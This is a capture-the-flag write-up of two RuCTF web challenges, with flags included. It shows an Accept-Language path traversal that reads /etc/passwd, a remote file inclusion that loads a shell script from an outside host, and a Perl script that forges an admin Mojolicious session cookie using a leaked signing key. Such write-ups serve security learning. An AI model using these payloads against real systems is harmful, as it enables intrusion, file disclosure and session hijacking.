Web100

The task gives us a site with some text and a line at the bottom informing us that the language is detected automatically. We immediately thought of the Accept-Language HTTP header, which could be driving this feature. In fact, changing it to ‘Accept-Language: ../../../../etc/passwd;q=0.3’ leads us to the content of /etc/passwd. But that wasn’t the real vulnerability: we can also do RFI through it and execute our remote shell:

GET http://w1.quals.ructf.org/?x=cat%20index.php

Accept-Language: q=0.5,http://nurfed.madoka.be/test/shell.txt?

$flag = '5cf27d9bad2fe9d96d2bcf25c3b0bd14';

Web200

The challenge is about logging in as admin in this tiny application. Once you log in, the app sets a cookie called ‘mojolicious’, which is composed of a base64-encoded JSON object plus some ‘-’ and an MD5. Googling ‘mojolicious’ showed that it is a Perl technology. The JSON object holds the credentials of the logged-in user, so to log in as admin we just need to change the username field to ‘admin’. The problem is that the cookie must be signed correctly; we do this by calculating the HMAC-SHA1 of the base64-encoded payload containing the admin status, using ‘ructf’ as the key (hinted in the HTML source of the page). Then just replace the site’s cookie with the crafted one and get the flag:

#!/usr/bin/perl
# flag: 054ad7a734437d6853383ad919526dc5
use strict;
use warnings;
use Mojo::Util qw/hmac_sha1_sum b64_decode b64_encode/;

# Decode the session JSON from the original 'mojolicious' cookie value
my $s = b64_decode 'eyJuYW1lIjoiYXNkIiwiZXhwaXJlcyI6MTM5NDMyMTE3M30';
# Swap our username for 'admin'
$s =~ s/asd/admin/;
# Re-encode without line breaks; Mojolicious writes '=' padding as '-'
my $aa = b64_encode($s, '');
$aa =~ s/=/-/g;
# Sign the value with the key hinted in the page source
my $firm = hmac_sha1_sum $aa, 'ructf';
print $aa . "--" . $firm . "\n";

Razor4x